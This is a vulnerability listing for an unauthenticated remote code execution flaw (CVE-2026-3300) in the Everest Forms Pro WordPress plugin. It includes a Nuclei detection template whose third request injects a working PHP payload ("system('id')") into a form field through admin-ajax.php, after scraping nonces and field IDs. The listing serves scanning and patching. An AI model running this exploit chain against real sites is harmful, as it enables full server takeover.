Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
CVE-2026-3300
Verified
Description
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
Severity
Critical
CVSS Score
9.8
Exploit Probability
41%
Affected Product
everest-forms-pro
Published Date
June 9, 2026
Template Author
dhiyaneshdk
CVE-2026-3300.yaml
id: CVE-2026-3300
info:
name: Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
author: DhiyaneshDk
severity: critical
description: |
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
impact: |
Unauthenticated attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
remediation: |
Update to the latest version of Everest Forms Pro plugin.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cve
- https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584
- https://everestforms.net/changelog/
- https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-3300
epss-score: 0.40992
epss-percentile: 0.98489
cwe-id: CWE-94
metadata:
max-request: 3
verified: true
product: everest-forms-pro
vendor: wpeverest
fofa-query: body="/wp-content/plugins/everest-forms-pro/"
tags: cve,cve2026,wordpress,wp-plugin,everest-forms,rce,unauth,vkev
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/everest-forms-pro/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Everest Forms")'
- 'compare_versions(version, "<= 1.9.12")'
condition: and
internal: true
extractors:
- type: regex
name: version
internal: true
group: 1
regex:
- 'Stable tag:\s*([0-9.]+)'
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "evf-container","data-formid")'
condition: and
internal: true
extractors:
- type: regex
name: form_id
internal: true
group: 1
regex:
- 'data-formid=(?:\\"|")([0-9]+)'
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'name=(?:\\"|")_wpnonce[0-9]+(?:\\"|")\s+value=(?:\\"|")([a-f0-9]+)'
- type: regex
name: nonce_field
internal: true
group: 1
regex:
- 'name=(?:\\"|")(_wpnonce[0-9]+)(?:\\"|")\s+value='
- type: regex
name: text_field
internal: true
group: 1
regex:
- 'evf-field-text[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'
- type: regex
name: calc_field
internal: true
group: 1
regex:
- 'evf-field-number[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=[0-9]+\([a-z_-]+\)'
- type: word
part: body
words:
- '"success":true'
extractors:
- type: regex
group: 0
regex:
- 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)'
# digest: 4a0a00473045022100bb51ced73a72009a5718fface3e3acb733e990549b632b26ff3032103ba77df00220723c43b389e75dfffda6334a6566984905ced088f80c900c35005975f2d0505a:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-3300
CWE ID:
cwe-94
References
https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cvehttps://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584https://everestforms.net/changelog/https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/
Remediation Steps
Update to the latest version of Everest Forms Pro plugin.